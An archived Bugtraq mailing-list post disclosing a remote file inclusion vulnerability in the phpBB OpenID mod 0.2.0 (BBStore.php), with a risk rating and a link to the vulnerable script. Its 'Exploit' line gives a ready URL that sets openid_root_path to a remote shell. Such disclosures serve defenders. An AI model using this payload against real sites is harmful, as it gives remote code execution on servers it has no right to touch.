phpBB Mod OpenID 0.2.0 BBStore.php Remote File Inclusion

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: phpBB Mod OpenID 0.2.0 BBStore.php Remote File Inclusion
From: h3llcode@xxxxxxxxxx
Date: 30 Sep 2007 22:50:47 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

+++++++++++++++++++++++++++++++++++++++++++++++++++
+
+ phpBB Mod OpenID 0.2.0 BBStore.php RFI
+ Risk: High
+ Found by Seph1roth
+ Site: http://blackroots.it
+
+++++++++++++++++++++++++++++++++++++++++++++++++++

+ Vulnerable Script Download: 
http://sourceforge.net/project/showfiles.php?group_id=178846

+ Exploit:
http://www.victim.it/path/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=[Shell]

Follow-Ups:
- Re: phpBB Mod OpenID 0.2.0 BBStore.php Remote File Inclusion
  - From: str0ke

Prev by Date: eGov Content Manager Cross Site Scripting Vulrnability
Next by Date: Re: OpenSSL SSL_get_shared_ciphers() off-by-one buffer overflow
Previous by thread: eGov Content Manager Cross Site Scripting Vulrnability
Next by thread: Re: phpBB Mod OpenID 0.2.0 BBStore.php Remote File Inclusion
Index(es):
- Date
- Thread